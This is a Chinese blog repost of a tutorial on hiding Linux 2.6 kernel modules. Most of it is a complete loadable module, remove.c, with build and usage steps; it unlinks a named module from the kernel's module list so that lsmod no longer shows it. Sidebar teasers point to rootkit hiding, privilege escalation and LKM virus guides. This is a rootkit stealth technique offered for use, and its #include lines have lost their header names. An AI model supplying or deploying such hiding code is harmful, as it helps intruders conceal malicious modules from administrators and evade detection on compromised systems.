linux2.4内核模块隐藏,教你怎样隐藏Linux 2.6的内核模块

最新推荐文章于 2024-02-03 00:38:30 发布
最新推荐文章于 2024-02-03 00:38:30 发布
阅读量248 收藏 1
点赞数
文章标签: linux2.4内核模块隐藏

教你怎样隐藏Linux 2.6的内核模块

发布时间:2006-01-26 09:25:37来源:红联作者:thej

2.6内核与2.4内核相比,有了许多变化,模块部分的实现完全重写,结构也有了一些变化。2.4内核中模块隐藏的方式为:(参考madsys的phrack 61-03)

struct module *p;

for (p=&__this_module; p->next; p=p->next)

{

if (strcmp(p->next->name, str))

continue;

p->next=p->next->next; //   break;

}

2.4的module定义为:

struct module

{

unsigned long size_of_struct; /* == sizeof(module) */

struct module *next;

const char *name;

unsigned long size;

...

}

2.6为:

struct module

{

enum module_state state;

/* Member of list of modules */

struct list_head list;   /* Unique handle for this module */

char name[MODULE_NAME_LEN];

...

}

因此使用标准的内核list系列处理函数(不需要再闭门造车了),2.6版的进程隐藏重写为:

/*

* FileName: remove.c

* Author: CoolQ

* Date: 23:05 2004-9-2

* Makefile:

* ---------------- cut here -----------------

* obj-m += remove.o

* KDIR:= /lib/modules/$(shell uname -r)/build

* PWD:= $(shell pwd)

* default:

* $(MAKE) -C $(KDIR) SUBDIRS=$(PWD) modules

*----------------- cut here -----------------

* Compile:

* [root@coolq tmp]make

* Usage:

* [root@coolq tmp]insmod remove.ko mod_name=module_name_to_hide

*/

#include

#include

#include

#include

#include

#include

static char *mod_name = "module";

module_param(mod_name, charp, 0);

static int remove_init(void)

{

struct module *mod_head, *mod_counter;

struct list_head *p;

mod_head = &__this_module;

list_for_each(p, &mod_head->list){

mod_counter = list_entry(p, struct module, list);

if(strcmp(mod_counter->name, mod_name) == 0){

list_del(p);

printk("remove module %s successfully.\n", mod_name);

return 0;

}

}

printk("Can't find module %s.\n", mod_name);

return 0;

}

static void remove_exit(void)

{

}

module_init(remove_init);

module_exit(remove_exit);

MODULE_LICENSE("Dual BSD/GPL");

毛岱泽
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
嵌入式系统/ARM技术中的linux-2.6内核模块引用计数的实现
11-11
2.6内核中模块的命名方式为*.ko。模块在被使用时,是不允许被卸载的。编程时需要用“使用计数”来描述模块是否在被使用。  二、2.4内核使用计数的实现方法  2.4内核中,模块自身通过 MOD_INC_USE_COUNT, MOD_DEC...
Linux之内核级防火墙selinux模块
qq_41830712的博客
01-28 733
一、什么是selinux? SELinux(Security-Enhanced Linux) 是美国国家安全局(NSA)对于强制访问控制的实现,是 Linux历史上最杰出的新安全子系统。NSA是在Linux社区的帮助下开发了一种访问控制体系,在这种访问控制体系的限制下,进程只能访问那些在他的任务中所需要文件。SELinux 默认安装在 Fedora 和 Red Hat Enterprise Lin...
04 模块基础 隐藏模块
最新发布
这是一个c++热爱者的博客哟
02-03 794
sysfs 与 procfs 相类似,同样是一个基于 RAM 的虚拟文件系统,它的作用是将内核信息以文件的方式提供给用户程序使用,其中便包括我们的 rootkit 模块信息,sysfs 会动态读取内核中的 kobject 层次结构并在。简单测试,我们可以发现无论是在 procfs 中还是 sysfs 中都已经没有了我们的 rootkit 的身影,而提权的功能依旧正常,我们很好地完成了隐藏模块的功能。的身影,而提权的功能依旧正常,我们很好地完成了隐藏模块的功能。来获取当前内核模块的 module 结构体,
关闭SELinux
风 抖落了叶
12-12 449
Linux程 关闭SELinux SELinux(Security-Enhanced Linux) 是美国国家安全局(NSA)对于强制访问控制的实现,是 Linux历史上最杰出的新安全子系统。NSA是在Linux社区的帮助下开发了一种访问控制体系,在这种访问控制体系的限制下,进程只能访问那些在他的任务中所需要文件。SELinux 默认安装在 Fedora 和 Red Hat Enterprise...
Linux Rootkit之二:Linux模块加载与信息隐藏
Remy的学习记录
06-16 3646
LKM Rootkit是通过向系统中加载内核模块实现的。模块加载到系统后会增加一些可供系统探知其存在的信息,而这些信息正是Rootkit希望隐藏起来的。为了明确Linux模块向系统注册的信息以及隐藏方法,首先研究一下Linux模块加载的过程。 2.1 代码示例     在Linux系统下创建一个名为rl_module.c的文件,填入如下内容: #include #include #inc
Linux系统环境下的高级隐藏技术介绍
学习........
05-14 1265
文章来自:http://www.linuxdiyf.com/ 隐藏技术在计算机系统安全中应用十分广泛,尤其是在网络攻击中,当攻击者成功侵入一个系统后,有效隐藏攻击者的文件、进程及其加载的模块变得尤为重要。本文将讨论Linux系统中文件、进程及模块的高级隐藏技术,这些技术有的已经被广泛
linux2.4内核升级到linux2.6内核的步骤.pdf
06-09
### 从 Linux 2.4 内核升级到 Linux 2.6 内核的步骤详解 #### 一、背景介绍 随着技术的发展与需求的变化,Linux 内核也在不断更新迭代,以满足更高的性能需求和更多的功能支持。从早期的 2.4 版本到后来的 2.6 版本...
2.42.6Linux 内核可装载模块机制.pdf
03-10
2.4内核与2.6内核在模块输出内核符号方面也存在区别。在2.6版本中,内核提供了更完善的符号输出机制,允许模块通过`EXPORT_SYMBOL`宏暴露函数供其他模块调用,这增强了模块间的互操作性和重用性。 ### 命令行输入...
Linux2.62.4内核驱动程序的区别
12-13
### Linux 2.42.6 内核驱动程序的区别 #### 概述 随着技术的进步和发展,Linux 内核经历了多个版本的更迭。从 Linux 2.42.6 版本的更新,不仅仅是简单的数字变化,而是包含了大量重要的改进和增强功能。...
Linux2.6内核模块编译Makefile[归类].pdf
10-11
例如,在Linux 2.4内核模块编译中,使用SUBDIRS变量来指定子目录的路径,而在Linux 2.6内核模块编译中,使用M变量来指定当前工作目录。 七、编译模块的其他规则 在Makefile中,我们还可以看到其他的编译规则,例如...
Linux驱动程序中THIS_MODULE 的定义
01-09
结构体struct module在内核中代表一个内核模块,通过insmod(实际执行init_module系统调用)把自己编写的内核模块插入内核时,模块便与一个struct module结构体相关联,并成为内核的一部分。下面是结构体struct module的完整定义,接下来会逐个解释: struct module { enum module_state state; struct list_head list; char name[MODULE_NAME_LEN]; struct module_kobject mkobj; struct module_param_attrs *
Linux 可卸载内核模块完全指南
01-20
第一部分 基础知识 <br>1.1 什么是LKMs <br>1.2 什么是系统调用 <br>1.3 什么是内核符号表(Kernel-Symbol-Table) <br>1.4 如何实现从用户空间到内核空间的转换 <br>1.5 使用用户空间函数的方法 <br>1.6 常用内核空间函数列表 <br>1.7 什么是内核守护进程 <br>1.8 创建你自己的设备 <br><br>第二部分 渐入佳境 <br>2.1 如何截获系统调用 <br>2.2 一些有趣的系统调用 <br>2.2.1 发现有趣的系统调用(strace方法) <br>2.3 迷惑内核的系统表 <br>2.4 和文件系统有关的攻击 <br>2.4.1 如何隐藏文件 <br>2.4.2 如何隐藏文件的内容(完全的) <br>2.4.3 如何隐藏文件的某一部分(一个实现原型) <br>2.4.4 如何重新定向或者监视文件操作 <br>2.4.5 如何避免任何文件权限问题 <br>2.4.6 如何使的一个有入侵工具的目录不可存取 <br>2.4.7 如何改变CHROOT环境 <br>2.5 和进程有关的入侵 <br>2.5.1 如何隐藏任何进程 <br>2.5.2 如果改变文件的执行结果 <br>2.6 和网络(Socket)有关的入侵 <br>2.6.1 如果控制Socket操作 <br>2.7 TTY纪录的方法 <br>2.8 用LKMs写病毒 <br>2.8.1 如何让LKM病毒感染任何文件(不仅仅是模块) <br>2.8.2 如何让LKM病毒帮助我们进入系统 <br>2.9 使我们的LKM不可见,而且不可卸载 <br>2.10 其他的入侵kerneld进程的方法 <br>2.11 如何检查当前的我们的LKM <br><br>第三部分 解决方案(给系统管理员) <br>3.1 LKM检测的理论和想法 <br>3.1.1 一个使用的检测器的原形 <br>3.1.2 一个密码保护的create_module(...)的例子 <br>3.2 防止LKM传染者的方法 <br>3.3 使你的程序不可以被跟踪(理论) <br>3.3.1 一个反跟踪的实用例子 <br>3.4 使用LKMs来防护你的linux内核 <br>3.4.1 为什么我们必须允许任何一个程序都拥有可执行的权限 <br>3.4.2 链接的补丁 <br>3.4.3 /proc权限的补丁 <br>3.4.4 安全级别的补丁 <br>3.4.5 底层磁盘补丁 <br><br>第四部分 一些更好的想法(给hacker的) <br>4.1 击败系统管理员的LKM的方法 <br>4.2 修补整个内核-或者创建Hacker-OS <br>4.2.1 如何在/dev/kmem中找到内核符号表 <br>4.2.2 新的不需要内核支持的'insmod' <br>4.3 最后的话 <br><br>第五部分 最近的一些东西:2.2.x版本的内核 <br>5.1 对于LKM作者来说,一些主要的不同点 <br><br>第六部分 最后的话 <br>6.1 LKM传奇以及如何使得一个系统即好用又安全 <br>6.2 一些资源链接
关闭SELinux的方法
qq_43682605的博客
02-24 2576
关闭SELinux的方法
linux2.4内核模块隐藏,Linux环境下的高级隐藏技术
weixin_33040687的博客
04-29 527
摘要:本文深入分析了Linux环境下文件、进程及模块的高级隐藏技术,其中包括:Linux可卸载模块编程技术、修改内存映象直接对系统调用进行修改技术,通过虚拟文件系统proc隐藏特定进程的技术。隐藏技术在计算机系统安全中应用十分广泛,尤其是在网络攻击中,当攻击者成功侵入一个系统后,有效隐藏攻击者的文件、进程及其加载的模块变得尤为重要。本文将讨论Linux系统中文件、进程及模块的高级隐藏技术,这些技术...
隐藏自己的Linux内核模块
Netfilter
05-09 5669
前面我提倡使用oneshot模式加载模块,即让模块在init函数中把事情做完后就return -1,这样系统中便不存在这么一个模块,也就不需要隐藏了。 但是,由于THIS_MODULE宏的存在,我们发现实际上隐藏一个模块是多么地简单。事实上,模块可以在init函数中通过THIS_MODULE宏实现自隐藏的。 既然如此简单,还费事搞oneshot干嘛,精神洁癖总是不想看到return -1。 和进程隐藏完全不同,进程无法自己隐藏自己,只能依靠其它模块找到相应的task_struct,然后再摘链。 THIS_M
Casper-fs:一款功能强大的自定义隐藏Linux内核模块生成器
阿道夫的博客
01-29 326
针对lsmod的casper-fs模块可见操作密码为“Shazam”;将casper-fs改为不可见的操作密码为“AbraKadabra”;将敏感文件隐藏的操作密码为“Alakazam”,改为显示的操作密码也是“Alakazam”;文件的保护和解保护操作密码为“Sesame”;
抓住被恶意隐藏Linux内核模块
Netfilter
05-11 5482
前面的文章介绍了一种相对彻底的隐藏Linux内核模块的方法: https://blog.csdn.net/dog250/article/details/106023941 总结下来就是: 摘除list,使得/proc/modules中不可见。 摘除kobject,使得/sys/modules/中不可见。 摘除depend on,使得依赖模块的/sys/modules/$(depended)/holder/中不可见。 摘除vmap area list/rbtree,使得/proc/vmallocinfo中不
枚举和隐藏内核模块
qq_41071646的博客
01-19 749
这个还是根据作者Tesla.Angela所开源的程写的东西  感谢作者 无私奉献的精神   先说枚举 枚举是在应用层实现的   这里的精髓就是找到了 了 WIN64 上 SYSTEM_MODULE_INFORMATION 正确 的结构体定义  如果这个结构 找不对   那么 程序肯定是不对的   然后 用的是 函数 ZwQuerySystemInformation 的 第11号功能     ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值